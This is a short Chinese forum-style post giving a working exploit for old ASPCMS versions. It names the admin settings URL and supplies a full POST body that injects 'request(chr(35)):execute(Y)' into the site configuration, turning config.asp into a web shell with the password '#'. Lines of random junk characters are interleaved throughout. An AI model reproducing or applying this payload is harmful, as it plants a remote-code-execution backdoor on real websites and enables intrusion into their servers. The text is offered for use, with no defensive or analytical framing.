老的ASPCMS版本的秒杀拿SHELL漏洞
# a( _; p+ Q& Q6 X* _. R
7 _2 E* L7 ?/ m# g6 `: h; T 找到后台。。。然后
# e& R7 q$ b( g9 h; `& `! E0 i : K/ b s) B7 k1 i2 m, x+ i9 }$ c
/admin/_system/AspCms_SiteSetting.asp?action=saves
; i1 }, f& w% i 8 X, E% J% ?( _* i( a( W+ U( L
直接POST' J* g, u) _2 r3 S. @
# Z0 d) k) e/ I, x' yrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
& G9 J4 N! ?( H2 i" x, U$ ~ 6 y, P M0 k! M, q) ]. s
再连接配置文件config.asp 密码为#
; S; H2 {- s: y8 m$ u |